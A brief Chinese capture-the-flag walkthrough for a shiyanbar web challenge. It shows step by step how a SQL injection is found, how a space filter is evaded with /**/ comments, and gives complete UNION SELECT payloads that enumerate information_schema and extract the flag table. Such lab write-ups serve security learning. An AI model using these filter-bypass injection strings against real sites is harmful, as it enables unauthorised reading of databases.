1、地址:http://ctf5.shiyanbar.com/web/index_2.php(過濾了空格和--+等注釋符)
思路:確定注入參數值類型,直接輸入單引號,根據報錯信息確定參數值類型為字符型,如下圖所示。
2、正常思路輸入' or '1'='1,直接報錯,信息為SQLi detected!,首先猜測or被過濾,直接去掉or,繼續輸入' '1'='1,
仍然報錯,信息為SQLi detected!,猜測空格被過濾,直接輸入’or‘1’=‘1,如下圖所示,確定空格被過濾。
3、嘗試使用多行注釋符(塊注釋符)、一對英文括號、換行符、加號來代替空格。
第一次嘗試:快注釋符/**/
輸入'/**/or/**/'1'='1
輸入'/**/or/**/'1'='2,無任何返回,確定塊注釋符可以使用。
之后分別嘗試括號、換行符和加號,均不可使用,最終采用塊注釋符。
4、爆當前數據庫中的表
'/**/union/**/select/**/concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()/**/having'1'='1
5、爆flag表中字段和值
'/**/union/**/select/**/concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='flag'/**/having/**/'1'='1
'/**/union/**/select/**/flag/**/from/**/flag/**/having/**/'1'='1
